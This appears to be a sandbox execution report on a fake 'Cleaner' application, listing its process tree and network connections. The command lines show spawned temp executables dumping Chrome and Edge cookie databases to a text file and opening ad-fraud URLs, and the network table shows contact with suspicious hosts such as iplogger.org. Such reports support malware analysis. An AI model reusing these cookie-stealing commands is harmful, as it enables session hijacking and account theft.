"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=2100 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2424 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2340 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3616 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3260 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3356 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=2204 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3368 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 1684 -ip 1684
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1684 -s 2196
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0xdc,0x108,0x104,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0xe0,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe4,0x118,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
Network
| Country | Destination | Domain | Proto |
| N/A | 20.73.194.208:443 | tcp | |
| N/A | 40.126.31.8:443 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.97.97:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 20.189.118.208:80 | tcp | |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.237:80 | tcp | |
| N/A | 127.0.0.1:5985 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 52.219.64.23:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
